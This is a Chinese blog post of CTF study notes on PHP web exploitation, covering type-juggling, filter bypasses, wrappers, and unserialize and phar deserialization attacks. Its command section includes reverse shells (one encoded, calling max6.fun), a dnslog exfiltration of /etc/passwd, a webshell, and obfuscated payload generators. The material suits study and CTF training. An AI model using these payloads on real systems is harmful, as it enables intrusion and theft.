php相关

php相关

​ 借鉴了小迪安全以及各位大佬的博客,如果一切顺利,会不定期更新。

如果感觉不妥,可以私信删除。

默认有php基础。

文章目录

  • php相关
    • 1. php 缺陷函数
      • 1. `==`与`===`
      • 2. MD5
      • 3. intval()
      • 4. preg_match()
    • 2. php特性
      • 1. php字符串解析特性
      • 2. 杂项
    • 3. 命令执行与远程命令执行RCE
      • 1. 常见命令
      • 2. 常见绕过
    • 4. php URL封装协议(伪协议)
      • 1. file://
      • 2. php://
      • 3. zip:// bzip2:// zlib://
      • 4. data://
      • 5. 实例演示
    • 5. php反序列化
      • 1. 序列化格式
      • 2. 三种访问控制区别
      • 3. 魔术方法
      • 4. 绕过方法
        • 1. 绕过__wakeup()
        • 2. 绕过preg_match关键词匹配
        • 3. 绕过throw new Exception
        • 4. 绕过md5或sha1校验
      • 5. 反序列化字符逃逸
      • 6. php session反序列化
    • 6. phar反序列化
      • 1. 概念
      • 2. 绕过
    • 7. Soap反序列化
    • 参考文章

1. php 缺陷函数

正则表达式在线测试 | 菜鸟工具 (jyshare.com)

1. =====

== 弱类型比较,先转换成类型相同的再比较

=== 强类型比较,比较地址

var_dump("a123"==123);//false,正常情况读取到字母结束
var_dump("123a456"==123);//true
var_dump(0e35==0e36);//true,0*(10^a)类型转换后都是0
var_dump("hello"==0);//true,字符串转类型后是0
echo "123a"+7;//130
echo 7+"11a5";//18

2. MD5

  1. 数组绕过
if ($_GET['a'] != $_GET['b']){//?a[]=6&b[]=7if (md5($_GET['a']) === md5($_GET['b'])){echo 666;}
else{print 'Wrong.';}
}
  1. 自身前后md5相等绕过

意思是自身MD5后依旧是0e开头

$a=0e215962017;
if(md5($a)==$a){echo 666;
}
  1. 绕过==比较

使两个数MD5后都是0e 开头

$a=(string)"QNKCDZO";//a=QNKCDZO&b=240610708
$b=(string)"240610708";
if(  ($a!==$b) && (md5($a)==md5($b)) ){echo md5($a)." ".md5($b);
//0e830400451993494058024219903391 0e462097431906509019562988736854
}
  1. 使用fastcoll.exe绕过===判断

具体看我MD5强碰撞的复现。

3. intval()

定义:用于获取变量的整数值;通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。

intval(mix $var[,int $base=10])
$base,转化所使用的进制,$base0时看$var的前缀来转化
如果是0x或0X则原字符串使用16进制
如果是0则原字符串使用8进制
如果是0b或0B则原字符串使用2进制
否则原字符串使用10进制<?php
echo intval(42);                      // 42
echo intval(4.2);                     // 4
echo intval('42');                    // 42
echo intval('+42');                   // 42
echo intval('-42');                   // -42
echo intval(042);                     // 34
echo intval('042');                   // 42
echo intval(1e10);                    // 1410065408
echo intval('1e10');                  // 1
echo intval(0x1A);                    // 26
echo intval(42000000);                // 42000000
echo intval(420000000000000000000);   // 0
echo intval('420000000000000000000'); // 2147483647
echo intval(42, 8);                   // 42
echo intval('42', 8);                 // 34
echo intval(array());                 // 0
echo intval(array('foo', 'bar'));     // 1
?>
  1. 进制转换绕过
$num="0x117c";
if($num==="4476"){die("no no no!");
}
if(intval($num,0)===4476){//字符串转intecho "you got it";
}
else{echo intval($num,0);
}
  1. 科学计数法绕过
  2. 小数点绕过

intval()函数如果base为0,字符串包含字母就停止读取,除了e。

header("Content-Type:text/html;charset=utf-8");
$a=$_GET['a'];//?a=4476e1或者4476.1
echo $a;
if($a==4476){die("no no no!");}
if(intval($a,0)==4476){echo "yes";
}

4. preg_match()

正则匹配函数

int preg_match ( string $pattern , string $subject [, array &$matches [, int $flags = 0 [, int $offset = 0 ]]] ) $pattern: 要搜索的模式,字符串形式。
$subject: 输入字符串。
$matches: 如果提供了参数matches,它将被填充为搜索结果。 $matches[0]将包含完整模式匹配到的文本, $matches[1] 将包含第一个捕获子组匹配到的文本,以此类推。

​ 当preg_match返回值不以===的形式判断时,可以使其返回出现错误时的False来冒充未匹配到字符串时返回的0

  1. preg_match()函数要求第二个参数subject为字符串,可以传一个数组,使函数返回False。

在这里插入图片描述

  1. 利用%0a截断字符串进行换行绕过,需要在浏览器上传参。
<?php
header("Content-Type:text/html;charset=utf-8");
$a=$_GET['a'];
//"hello%0a"
if(preg_match('/^hello$/',$a)&&$a!=="hello"){echo "success";
}else{echo "fail";
}

在这里插入图片描述

  1. 利用PCRE回溯的有限次绕过。(标志是贪婪匹配)

PHP利用PCRE回溯次数限制绕过某些安全限制 | 离别歌 (leavesongs.com)

var_dump(ini_get('pcre.backtrack_limit'));//最大回溯次数,1000000
$a="union /*".str_repeat('a',1000000)."*/ select";
var_dump(preg_match('/union.+?select/is','')&&$a!=="hello");//False

2. php特性

1. php字符串解析特性

PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:

  1. 删除空白格
  2. 将某些字符转换成下划线。

在这里插入图片描述

$a=$_GET['a_b_c_d'];
//?a+b.c.d=%0ahello
if(substr_count($_SERVER['QUERY_STRING'],'_')==0){//变量名需要绕过_if(preg_match("/^hello$/im",$a)){//多行匹配if(!preg_match("/^hello$/i",$a)){echo "you got it";}}
}

php变量名不允许使用点号,会变成下划线,但如果出现了[,那么这个[转变为下划线后,后面的点并不会转化。

$a=$_GET['a_b.c.d'];//?a[b.c.d=6
echo $a;//6

2. 杂项

_()gettext()的拓展函数
在开启相关设定后,_("666")等价于gettext("666"),且就返回其中的参数

3. 命令执行与远程命令执行RCE

Lazzaro佬太强啦

1. 常见命令

在这里插入图片描述

#linux常见命令
cat/more/less/head/sort/tail/nl/sed/cut/tac/awk/strings/od/curl/wget#向文件xxx写ls的内容
ls > xxx 
ls|tee xxxcurl -X POST -d"data=123&key=456" http://www.jackyops.com/search -v #写shell
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9tYXg2LmZ1bi82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}' #bash -i >& /dev/tcp/max6.fun/6666 0>&1
echo -e "%23!/bin/sh\nwhile read line\ndo\necho \$line\ndone < /flag" > ../../../read # #!后面跟着解释器的路径
bash -c "bash -i > /dev/tcp/[IP]/[Port] 0>&1 2>&1" #反弹shell#从网站下载内容并写入文件
curl -o shell.php http://xxxxxx.txt
wget -O shell.php http://xxxxxx.txt#从网站下载文件到shell.php中#windows cmd
type#php
system/exec/shell_exec/passthru/popen/proc_open/反引号pcntl_exec('/bin/ls', array('-l'));  #在windows不可用# 这行代码之后的任何代码都不会被执行,因为进程已经被替换php -r '$sock=fsockopen("ip",6666);exec("/bin/bash -i <&3 >&3 2>&3");'#拼接符
gcc m1.c& 后台执行
|  上一条命令的输出作为下条命令的输入
&& 前一条命令执行成功时,才执行后一条命令
|| 上一条命令执行失败后,才执行下一条命令
cat file1;data;pwd;who  #;把多条命令,拼接在一起后执行
//echo @eval(new Exception(system('calc')));
//echo `whoami`;
//call_user_func('system',"whoami");
//echo exec("whoami");echo fgets(popen('whoami','r'));//popen打开一个指向命令的进程的指针
$descriptorspec = array(  0 => array("pipe", "r"),  // stdin 是从 PHP 来的一个管道  1 => array("pipe", "w"),  // stdout 是一个管道,送到 PHP  2 => array("pipe", "w")   // stderr 是一个管道,送到 PHP  );  $process = proc_open('whoami', $descriptorspec, $pipes);  if (is_resource($process)) {  // 读取输出  $stdout = stream_get_contents($pipes[1]);  fclose($pipes[1]);  // 关闭进程  $return_status = proc_close($process);  echo "命令输出:\n$stdout";  }//echo new ReflectionClass(system("dir")());//php反射
class A{public function abc($a){echo $a;}
}
$rc=new ReflectionClass('A');//通过反射获取类
$func=$rc->newInstance();//实例化类
$func->abc("666");//@ 符号被称为错误控制运算符,它会告诉PHP忽略该表达式执行时产生的任何错误消息

2. 常见绕过

空格

<<>%20%09(需要php环境),$IFS${IFS}$IFS$9{cat,1.txt}

加号

通过 GET方式传值的时候,+号会被浏览器处理为空,所以需要转换为%2b

分号

%0a

命令(比如cwd)

a=p;b=wd;$a$b,p''wd,p""wd,p\`\`wd,p\wd,pwd$u,`echo cHdk|base64 -d\`,echo "707764"|xxd -r -p|bash
#xxd -r -p,还原hex文件,将纯十六进制转储的反向输出打印为了ASCII格式

关键词(比如flag)

fla*,f???,flag$u,fl“a”g,fl‘a’g
php -r "echo chr(47).chr(102).chr(108).chr(97).chr(103)"

IP地址

转数字地址:https://ipnum.bmcx.com/

利用平台

curl https://bashupload.com/ -T file.txt #上传文件到bashupload.com上
curl `cat /etc/passwd|base64`.xxx.dnslog.cn #参数放子域名,通过dns外带

php

echo [].[];//ArrayArray
$_= (0/0)._;
echo $_;//NAN_
$_=$_[0];
echo $_;//N
echo (_/_._)[0];//N

取反

<?php
$ans1='system';//函数名
$ans2='dir';//命令
$data1=('~'.~$ans1);//通过两次取反运算得到system
$data2=('~'.~$ans2);//通过两次取反运算得到dir
$b= ('('.$data1.')'.'('.$data2.')'.';');
echo eval($b);

linux下

~a=-(a+1)

八进制ls命令
$'\154\163'$(())=0
$((~$(())))=-1
$((1<<1))=2
${##}=1
$0 	bash命令bash对整数的表达形式为`[base#]n`
比如十进制4表示成2进制100,在bash里可以表示为`2#100`
154可以用$(($((1<<1))#10011010)) 表示在bash里,`<<<`称作(here-strings),语法:`command [args] <<< ["]$word["]`
其中$word会展开并作为command的stdin
bash <<< $\'\\154\\163\' 右侧命令将初步解析为$'\154\163',作为参数给到bash命令使用两次here-strings完成ls -al指令
$0<<<$0\<\<\<\$\'\\$(($((1<<1))#10011010))\\$(($((1<<1))#10100011))\\$(($((1<<1))#101000))\\$(($((1<<1))#110111))\\$(($((1<<1))#10001101))\\$(($((1<<1))#10011010))\'
cmd = 'ls -al'
payload = '$0<<<$0\\<\\<\\<\\$\\\''
for c in cmd:payload += f'\\\\$(($((1<<1))#{bin(int(oct(ord(c))[2:]))[2:]}))'
payload += '\\\''
print(payload)
/**
* 复制并使用代码请注明引用出处哦~
* Lazzaro @ https://lazzzaro.github.io
*/

仅含 <$!{}()_&

下面代码在kali linux中跑不了,原因如下

echo $0的结果是zsh时,a=123运行echo${!a}的结果是echo ${a=123},再按回车输出123,另外运行${$(())}结果是0。

echo $0的结果是bash时,a=$(())运行echo${!a}的结果是bash,下面代码可以执行。

所以是bash与zsh间接引用${!name}的区别?!!

cmd = 'ls -al'r = {}x = '$((~$(())))'#-1for i in range(1,9):r[i] = '$((~$(('+xfor j in range(i):r[i] += xr[i] += '))))'r[0] = '$(())'payload = '__=$(())&&${!__}<<<${!__}\\<\\<\\<\\$\\\''
for c in cmd:payload += '\\\\'for i in oct(ord(c))[2:]:payload += r[int(i)]payload += '\\\''
print(payload)
"""
__=$(())&&${!__}<<<${!__}\<\<\<\$\'\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$(())\\$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\'
"""/**
* 复制并使用代码请注明引用出处哦~
* Lazzaro @ https://lazzzaro.github.io
*/

在这里插入图片描述

4. php URL封装协议(伪协议)

include() // include在包含的过程中如果出现错误,会抛出一个警告,程序 继续正常运行

include_once() // 如果一个文件已经被包含过,则不会在包含它

require() // require函数出现错误的时候,会直接 报错并退出 程序的执行。

require_once() // 如果一个文件已经被包含过,则不会在包含它

php.ini(配置文件):file://协议在双off的情况下也可以使用。

allow_url_fopen :off/on

allow_url_include:off/on

URL封装协议(URL wrapper)允许你通过统一的接口来访问不同类型的资源。

file:// — 访问本地文件系统,
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流(I/O streams),
zlib:// — 压缩流,可访问压缩文件中的子文件,无需指定后缀名
bzip2://
zip://
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流

1. file://

条件:include()等参数可控,目录下支持脚本解析

用法:file:///uploads/1.php

file://http://xxx.com/xx.php

2. php://

https://www.php.net/manual/zh/wrappers.php.php

条件:allow_url_include为on

以下为常见形式

'php://input' //POST请求的情况下,php://input可以获取到post的数据,enctype为multiple/form-data时无效'php://output'//只写数据流,允许以echo和print方式写入到输出缓冲区'php://filter'//常用,可实现任意文件读取/*
resource=<要过滤的数据流>     这个参数是必须的。它指定了你要筛选过滤的数据流。
read=<读链的筛选列表>         该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
write=<写链的筛选列表>    该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
<;两个链的筛选列表>    任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。*///对read和write常见过滤器有string.rot13,string.toupper,string.tolower,string.strip_tags,convert.base64-encode//?page=php://filter/read=convert.base64-encode/resource=upload.php

3. zip:// bzip2:// zlib://

条件:allow_url_fopen:off/on allow_url_include :off/on

用法:

zip://[压缩文件绝对路径]%23[压缩文件内的子文件名]
compress.bzip2://file.bz2
compress.zlib://file.gz

4. data://

条件:allow_url_fopen:on allow_url_include :on

作用:数据流封装器,用来传递相应格式数据,可执行php代码

用法:

data://text/plain,<?php%20phpinfo();?>
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

5. 实例演示

index.php

<?php
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);
if(isset($_GET['filter'])){$f=$_GET['filter'];echo $f;echo "<br>";include($f);//include_once($f);//$l=file_get_contents($f);//allow_url_include = On//echo $l;/*?filter=php://filter/read=convert.base64-encode/resource=1.php?filter=file://C:\phpstudypro\WWW\1.php //写绝对路径http://localhost/index.php?filter=php://inputPOST: <?php phpinfo();@eval($_POST['123']);?> //文件包含漏洞,antsword直接连zip://1.zip%231.php  //%23是#data://text/plain,<?php%20echo%20file_get_contents('1.php');?>http://localhost/1.php*/  
}

1.php

<?php
$flag="flag{you_got_it,baby}";
echo $flag;

在当前目录下将1.php压缩成1.zip。

在这里插入图片描述

在这里插入图片描述

5. php反序列化

1. 序列化格式

概念:序列化就是使用serialize()将对象的用字符串的方式进行表示,反序列化是使用unserialize()将序列化的字符串,构造成相应的对象,反序列化是序列化的逆过程。 序列化的对象可以是class也可以是Array,string等其他对象。

问题原因:漏洞的根源在于**unserialize()**函数的参数可控。如果反序列化对象中存在魔术方法,而且魔术方法中的代码或变量用户可控,就可能产生反序列化漏洞,根据反序列化后不同的代码可以导致各种攻击,如代码注入、SQL注入、目录遍历等等。

序列化格式:

对象类型:对象名长度:”对象名”:对象成员变量个数:{变量1类型:变量名1长度:变量名1; 参数1类型:参数1长度:参数1; 变量2类型:变量名2长度:”变量名2”; 参数2类型:参数2长度:参数2;… …}

提示符数据类型格式
s字符串s:size:value;
i整数i:value;
d浮点数d:value;
b布尔值b:value;(保存0或1)
N空值N;
a数组a:size:{key definition;value definition;[repeat]}
O对象O:strlen(Object name):Object name:Object size:{s:strlen(property name):name;property definition;[repeat]}
R指针引用R:9;
<?php
class Person{public $name;public $age;public $array1;//第一个key为0,第二个key为call,第三个为1public $obj;public function __construct($n=null,$a=null,$arr=[],$obj){$this->name=$n;$this->age=$a;$this->array1=$arr;$this->obj=$obj;}public function hello(&$obj){print("name: ".$this->name." age: ".$this->age);}
}
class c{public $price;public $height;public function __construct($n=null){$this->price=$n;$this->height=&$this->price;//指针引用//Person,name,age,array1,array1里的三个元素,obj,price//引用的price为第九个,故R:9}
}
$a=new Person("cllsse",123,[False,"call"=>119,null],new c(110.1));
echo serialize($a);

O:6:"Person":4:{s:4:"name";s:6:"cllsse";s:3:"age";i:123;s:6:"array1";a:3:{i:0;b:0;s:4:"call";i:119;i:1;N;}s:3:"obj";O:1:"c":2:{s:5:"price";d:110.1;s:6:"height";R:9;}}

2. 三种访问控制区别

public: 变量名

protected: \x00 + * + \x00 + 变量名(或 \00 + * + \00 + 变量名%00 + * + %00 + 变量名

private: \x00 + 类名 + \x00 + 变量名(或 \00 + 类名 + \00 + 变量名%00 + 类名 + %00 + 变量名

注:>=php v7.2 反序列化对访问类别不敏感(protected -> public)

<?php
class B{public $aa;protected  $bb;private $cc;
}
$a=new B();
$b=serialize($a);
echo $b."\n";//O:1:"B":3:{s:2:"aa";N;s:5:"*bb";N;s:5:"Bcc";N;}
echo serialize(unserialize("O:1:\"B\":3:{s:2:\"aa\";N;s:5:\"\00*\00bb\";N;s:5:\"\00B\00cc\";N;}"));

3. 魔术方法

__construct()  #每次创建新对象时先调用此方法
__destruct()  #某个对象的所有引用都被删除或者销毁时调用
#没有变量指到当前对象时也会被触发
# a:2:{i:0;O:4:"User":0:{}i:0;s:3:"xxx";},被覆盖后没有变量指向User对象)
__toString()  #把类被当做一个字符串使用时调用
__wakeup()  #使用unserialize函数,反序列化恢复对象之前时调用
__sleep()  #使用serialize()函数,序列化对象之前时调用
__call()  #在对象中,调用不存在的方法或调用权限不足时调用
__callstatic()    #在静态上下文中,调用不可访问的方法时触发
__get()  #访问不存在的成员变量时调用
__set()   #设置不存在的成员变量时调用
__invoke()  #当尝试以调用函数的方式调用一个对象时触发
__autoload()  #尝试加载未定义的类
__isset()   #在不可访问的属性上调用isset()或empty()触发
__unset()   #在不可访问的属性上使用unset()时触发

4. 绕过方法

1. 绕过__wakeup()

CVE-2016-7124

利用条件:

  • php5:< 5.6.25
  • php7:< 7.0.10

当反序列化时, 给出的字段个数的数字小于提供的字段个数, 将不会执行__wakeup

<?php
class c{public $price;public $height;public function __construct($n=null){$this->price=$n;$this->height=&$this->price;echo "调用了construct"."<br>";}public function __wakeup(){echo "调用了wakeup"."<br>";}public function __destruct(){echo "调用了destruct"."<br>";}
}
$a=new c();
$a=serialize($a);
echo $a."<br>";
//O:1:"c":2:{s:5:"price";N;s:6:"height";R:2;}
$b=unserialize('O:1:"c":10:{s:5:"price";N;s:6:"height";R:2;}');//2<10绕过wakeup
echo gettype($b)."<br>";

在这里插入图片描述

  • php7.3 __wakeup绕过

使用内置类 ArrayObject

其他类:ArrayIterator / RecursiveArrayIterator / SplObjectStorage

愚人杯3rd easy_php

$arr=array("a"=>1,"b"=>2);
$ao=new ArrayObject($arr);
echo serialize($ao);
//C:11:"ArrayObject":45:{x:i:0;a:2:{s:1:"a";i:1;s:1:"b";i:2;};m:a:0:{}}
<?php
class ctfshow {public $ctfshow;public function __wakeup(){die("not allowed!");}public function __destruct(){echo "OK";system($this->ctfshow);}
}
$data = $_GET['1+1>2'];
if(!preg_match("/^[Oa]:[\d]+/i", $data)){unserialize($data);
}
/*
$a=new ctfshow;
$a->ctfshow="whoami";
$arr=array("evil"=>$a);
$oa=new ArrayObject($arr);
$res=serialize($oa);
echo $res; */
//?1%2b1%3E2=C:11:"ArrayObject":77:{x:i:0;a:1:{s:4:"evil";O:7:"ctfshow":1:{s:7:"ctfshow";s:6:"whoami";}};m:a:0:{}}
2. 绕过preg_match关键词匹配
  • php低版本

使用+<绕过正则^O:\d+

O:+1:"c":2:{s:5:"price";N;s:6:"height";R:2;}

O:<1:"c":2:{s:5:"price";N;s:6:"height";R:2;}

  • 16进制绕过

当序列化类型是s时,可使用大写S来进行16进制绕过

$b=unserialize('O:1:"c":2:{S:5:"\70\72\69\63\65";N;s:6:"height";R:2;}');

3. 绕过throw new Exception
$c=@unserialize($_POST['123']);
throw new Exception("fail");//throw new Exception会先于destruct()执行
  • 去掉最后大括号,利用反序列化报错来防止进入Exception
POST: 123=a:2:{i:0;O:1:%22c%22:2:{s:5:%22price%22;N;s:6:%22height%22;R:3;}i:1;i:0;
  • GC垃圾回收机制
$a=new c();
$b=array($a,0);
$b=serialize($b);
echo $b."\n";//a:2:{i:0;O:1:"c":2:{s:5:"price";N;s:6:"height";R:3;}i:1;i:0;}
//POST: a:2:{i:0;O:1:"c":2:{s:5:"price";N;s:6:"height";R:3;}i:0;i:0;}
//把最后一个key改为0

因为反序列化的过程是顺序执行的,所以到第一个属性时,会将Array[0]设置为c对象,同时我们又将Array[0]设置为null,这样前面的c对象便丢失了引用,就会被GC所捕获,便可以执行__destruct

4. 绕过md5或sha1校验
if( ($this->var1 != $this->var2) && (md5($this->var1) === md5($this->var2)) && (sha1($this->var1) === sha1($this->var2)) ) {echo eval($this->var1);
}

利用两个不同对象,__toString()方法返回值相同的方式绕过

$a1=new Exception($cmd,0);$a2=new Exception($cmd,1);//$code不同
//写在同一行toString相同

5. 反序列化字符逃逸

​ PHP 在反序列化时,底层代码是以 ; 作为字段的分隔,以 } 作为结尾(字符串除外),并且是根据长度判断内容的。

​ 对于服务端上将传入的字符串实际长度进行增加或减少(例如替换指定字符到更长/短的字符), 我们就可以将其溢出并且对我们的恶意字符串反序列化。

字符串增加时

<?php
Class Test{public $name="lxx";public $id=114514;public $wage=9.9;
}
function filter($str){return str_replace("x","yy",$str);//x替换成yy
}
$a=new Test();
echo serialize($a)."\n";
//O:4:"Test":3:{s:4:"name";s:3:"lxx";s:2:"id";i:114514;s:4:"wage";d:9.9;}
echo filter(serialize($a))."\n";
//O:4:"Test":3:{s:4:"name";s:3:"lyyyy";s:2:"id";i:114514;s:4:"wage";d:9.9;}

可以看到xx被替换成了``yyyy`

假设我们要插入替换的代码为";s:2:"id";i:1919810;s:4:"wage";d:12.5;},长度为40

与前面闭合成s:3:"lxx";s:2:"id";i:1919810;s:4:"wage";d:12.5;}"

1+x+40=1+2x

x=40,即需要40个x来完成逃逸。

$b='O:4:"Test":3:{s:4:"name";s:81:"l'.str_repeat('x',40).'";s:2:"id";i:1919810;s:4:"wage";d:12.5;}';
$b=$b.'";s:2:"id";i:114514;s:4:"wage";d:9.9;}';
echo $b."\n";
$c=filter($b);
var_dump($c);
echo serialize(unserialize($c));
//O:4:"Test":3:{s:4:"name";s:81:"l
//xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
//";s:2:"id";i:1919810;s:4:"wage";d:12.5;}
//";s:2:"id";i:114514;s:4:"wage";d:9.9;}

在这里插入图片描述

可以看到filter函数执行后,s:81多了一堆y占位,让我们插入的恶意代码成功逃逸,并且在反序列化的过程中,截断了第一个}后面的内容。

字符串减少时

<?php
Class Test{public $name="lxx";//可控public $fruit="apple";//可控public $id=114514;//需要修改的
}
function filter($str){return str_replace("x","",$str);//x替换成""
}
$a=new Test();
echo serialize($a)."\n";
//O:4:"Test":3:{s:4:"name";s:3:"lxx";s:5:"fruit";s:5:"apple";s:2:"id";i:114514;}
echo filter(serialize($a))."\n";
//O:4:"Test":3:{s:4:"name";s:3:"l";s:5:"fruit";s:5:"apple";s:2:"id";i:114514;}

我们需要让";s:5:"fruit";s:5:被吞掉,作为name的值,fruit的值的前引号会将其闭合

需要给fruit的值赋值为";s:2:"id";i:119;s:5:"fruit";s:0:"";}s:0:"

然后原本fruit的值的后引号会与其闭合。

$b='O:4:"Test":3:{s:4:"name";s:19:"l'.str_repeat('x',18).'";s:5:"fruit";s:5:';
$b=$b.'";s:2:"id";i:119;s:5:"fruit";s:0:"";}s:0:"'.'";s:2:"id";i:114514;}';
echo $b."\n";
echo serialize(unserialize(filter($b)));
//O:4:"Test":3:{s:4:"name";s:3:"lxxxxxxxxxxxxxxxxxx";s:5:"fruit";s:5:
//";s:2:"id";i:119;s:5:"fruit";s:0:"";}s:0:"
//";s:2:"id";i:114514;}

在这里插入图片描述

6. php session反序列化

​ PHP中的session中的内容并不是放在内存中的,而是以文件的方式来存储的,存储方式就是由配置项 session.save_handler 来进行确定的,默认是以文件的方式存储。存储的文件是以sess_[sessionid]来进行命名的。

利用条件:

  1. 可以进行任意文件包含
  2. 直到session文件存放路径
  3. 具有读取和写入session文件的权限。

序列化和反序列化时使用引擎的不同会导致序列化注入漏洞

session.serialize_handler定义的引擎有三种

处理器名称存储格式
php键名 + | + 经过serialize()函数序列化处理的值
php_binary键名的长度对应的 ASCII 字符 + 键名 + 经过serialize()函数序列化处理的值
php_serialize经过serialize()函数序列化处理的数组,(php>5.5.4)
<?php
error_reporting(0);
ini_set('session.serialize_handler','php');
session_start();
$_SESSION['session'] = $_GET['session'];//?session=hello
?>

找到生成的session文件sess_uvbc2v9bb88mlrdkssab294761

在这里插入图片描述

使用php对应的session文件内容为session|s:5:"hello";

使用php_binary 对应的session文件内容为 sessions:5:"hello";

strlen(sessions)为8,对应不可见字符。

使用php_serialize对应的session文件内容为a:1:{s:7:"session";s:5:"hello";}

a:1表示$_SESSION数组中有一个元素

下面来尝试一下

index.php

<?php
error_reporting(0);
ini_set('session.serialize_handler','php_serialize');
session_start();
$_SESSION['session'] = $_GET['session'];
?>

1.php

<?php
error_reporting(0);
ini_set('session.serialize_handler','php');
session_start();
class Test{public $name="666";public function __construct() {echo "construct";}public function __destruct(){echo $this->name;}
}
$str=new Test();
?>

?session=|O:4:"Test":1:{s:4:"name";s:6:"cllsse";}

查看session文件,内容为a:1:{s:7:"session";s:40:"|O:4:"Test":1:{s:4:"name";s:6:"cllsse";}

此时访问1.php

在这里插入图片描述

利用参考

PHP BUG #71101

6. phar反序列化

1. 概念

phar文件本质上是一种压缩文件,在使用phar协议文件包含时,也是可以直接读取zip文件的。使用phar://协议读取文件时,文件会被解析成phar对象,phar对象内的以序列化形式存储的用户自定义元数据(metadata)信息会被反序列化。这就引出了我们攻击手法最核心的流程。

流程:构造phar(元数据中含有恶意序列化内容)文件—>上传—>触发反序列化

php中有一大部分的文件系统函数在通过phar://伪协议解析phar文件时都会将meta-data进行反序列化。

利用条件:

  1. 我们需要在本地环境的 php.ini 中将 ;phar.readonly = On 改为 phar.readonly = Off

  2. phar文件要能够上传到服务器端。能触发的文件操作函数:

    include、file_get_contents、file_put_contents、copy、file、file_exists、is_executable、is_file、is_dir、is_link、is_writable、fileperms、fileinode、filesize、fileowner、filegroup、fileatime、filemtime、filectime、filetype、getimagesize、exif_read_data、stat、lstat、touch、md5_file

  3. 要有可用的魔术方法作为“跳板”。

  4. 文件操作函数的参数可控,且:/phar等特殊字符没有被过滤。

https://www.php.net/manual/zh/phar.fileformat.phar.php

phar 文件格式实际上是按照 stub/manifest/contents/signature 的形式排列的,若我们修改manifest的内容,则还需要修改manifest中表示其长度的那4字节和表示phar元数据长的的4字节,所以建议是不要修改元数据内容时增加或减少字符数。

1.php

highlight_file(__FILE__);
class getflag{function __destruct(){echo "flag{666}";}
}
class User {Public $name;public function __construct($n){$this->name=$n;}public function __destruct(){  $data = $_POST[0];if (preg_match('/get|flag|post|php|filter|base64|rot13|read|data/i', $data)) {die("我知道你想干吗,我的建议是不要那样做。");}echo "you got it,".$this->name;echo $data;echo file_get_contents($data);}
}
unserialize($_GET[0]);
//a:2:{i:0;O:7:"getflag":0:{}i:0;N;}
//O:4:"User":1:{s:4:"name";s:6:"cllsse";}
throw new Error("那么就从这里开始起航吧");

index.php

<?php
class getflag {
}@unlink("phar.phar");
$phar = new Phar("phar.phar"); //后缀名必须为phar,生成后可以随意修改
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub
$o = new getflag();
$o=array(0=>$o,1=>null);
echo $o;
$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

运行生成phar.phar

修改phar文件来强制触发GC回收机制绕过throw new Error,另存为p1.phar

a:2:{i:0;O:7:"getflag":{}i:0;N;}

在这里插入图片描述

phar文件签名修复脚本

# -*- coding: utf-8 -*-
from hashlib import sha1
with open(r'C:\phpstudypro\WWW\p1.phar', 'rb')as fp:f=fp.read() # 修改内容后的phar文件s = f[:-28] # 获取要签名的数据h = f[-8:] # 获取签名类型以及GBMB标识newf = s+sha1(s).digest()+h # 数据 + 签名 + 类型 + GBMBopen(r'C:\phpstudypro\WWW\p2.phar', 'wb').write(newf) # 写入新文件

在这里插入图片描述

运行python将p2.phar压缩为zip文件,绕过preg_match关键词匹配

# -*- coding: utf-8 -*-
import gzip
file = open("C:\phpstudypro\WWW\p2.phar", "rb") #打开文件
file_out = gzip.open("C:\phpstudypro\WWW\p3.zip", "wb+")#创建压缩文件对象
file_out.writelines(file)
file_out.close()
file.close()

运行python发送请求

import requests
url='http://localhost/1.php'
res=requests.post(url,params={0:r'O:4:"User":1:{s:4:"name";s:6:"cllsse";}'},data={0:'phar://./p3.zip'})
print(res.text)

在这里插入图片描述

利用参考

NSSCTF平台-第一周Prize赛题

2. 绕过

压缩绕过关键字匹配

phar://不能出现在首部

compress.zlib://phar://
compress.bzip2://phar://
php://filter/resource=phar://

脚本构造phar文件

详见Lazzaro佬的脚本

7. Soap反序列化

SOAP : Simple Object Access Protocol简单对象访问协议。

SOAP简单的理解就是这样的一个开放协议SOAP=RPC+HTTP+XML:
采用HTTP作为底层通讯协议;RPC(远程过程调用)作为一致性的调用途径,XML作为数据传送的格式,允许服务提供者和服务客户经过防火墙在INTERNET进行通讯交互。

